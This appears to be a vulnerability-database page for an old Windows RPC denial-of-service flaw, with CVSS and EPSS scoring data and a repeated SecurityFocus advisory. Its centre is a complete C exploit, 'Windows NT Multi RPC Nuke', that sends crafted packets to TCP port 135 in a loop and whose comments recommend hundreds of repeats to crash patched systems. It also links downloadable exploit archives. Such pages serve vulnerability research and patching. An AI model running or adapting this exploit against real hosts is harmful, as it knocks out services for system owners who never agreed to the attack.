CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:N/I:N/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
24.73%
–
–
2022-04-03
–
–
24.73%
–
–
2023-03-12
–
–
–
70.9%
–
2023-04-16
–
–
–
69.28%
–
2023-06-04
–
–
–
69.28%
–
2023-09-10
–
–
–
59.36%
–
2024-01-28
–
–
–
56.3%
–
2024-02-11
–
–
–
56.3%
–
2024-06-02
–
–
–
56.3%
–
2024-08-04
–
–
–
44.83%
–
2024-11-24
–
–
–
44.83%
–
2024-12-22
–
–
–
82.06%
–
2025-01-19
–
–
–
82.06%
–
2025-03-18
–
–
–
–
58.58%
2025-03-30
–
–
–
–
58.24%
2025-03-30
–
–
–
–
58.24,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
// source: https://www.securityfocus.com/bid/6005/info
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.
/*
* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ http://www.cnhonker.com
* Upgraded By Trancer @ http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this
vulnerability with an offical M$ update,
* an attacker can still DoS that system if he activate this exploit a lot
of times, fast.
* So I've upgraded the exploit by looping it and letting you control the
times you want to nuke a system
* (with a patched 2000\XP 250-400 times is recommended).
*
* That's it. enjoy :-)
\*
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
char sendcode2[] =
"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
char sendcode3[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";
char sendcode4[] =
"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x50\x10\x01\x00\x00\x00\x02\x00";
char sendcode5[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x80\xf9\x00\x00\x00\x00\x02\x00";
char sendcode6[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\xb0\xe2\x00\x00\x00\x00\x02\x00";
char sendcode7[] =
"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
"\x60\x15\x00\x00\x00\x00\x02\x00";
char sendcode8[] =
"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize,times,i;
SOCKET s;
char buffer[20480];
printf("======================= Windows NT Multi RPC Nuke V0.12
======================\r\n");
printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
===============\r\n");
printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
==============\r\n\n");
if (argc < 2)
{
printf("Usage:\r\n");
printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]);
printf("PS:\r\n");
printf(" If target is XP, try 2 times.\r\n");
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
times = 1;
if (argc >= 5) times = atoi(argv[4]);
for (i = 0; i < times; i = i + 1)
{
s = socket(AF_INET, SOCK_STREAM, 0);
if(s==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Packets...\n");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packets\r\n");
closesocket(s);
exit(1);
}
memset(&buffer, '\x41', 240);
send(s, buffer, 240, 0);
send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, '\x42', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, '\x43', 512);
send(s, buffer, 512, 0);
send(s, sendcode4, sizeof(sendcode4)-1, 0);
memset(&buffer, '\x44', 20480);
send(s, buffer, 20480, 0);
memset(&buffer, '\x44', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, '\x45', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, '\x46', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, '\x47', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, '\x48', 5000);
send(s, buffer, 5000, 0);
i = i + 1;
}
if (times < 2)
{
printf("Nuked! If target is XP, try a again! :)\r\n");
}
else
{
printf("%s was nuked %s times\r\n", argv[1], argv[4]);
}
closesocket(s);
WSACleanup();
return 0;
}
source: https://www.securityfocus.com/bid/6005/info
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21953.tar.gz
source: https://www.securityfocus.com/bid/6005/info
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possible to trigger this variant by flooding a system with malformed packets.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/21954.rar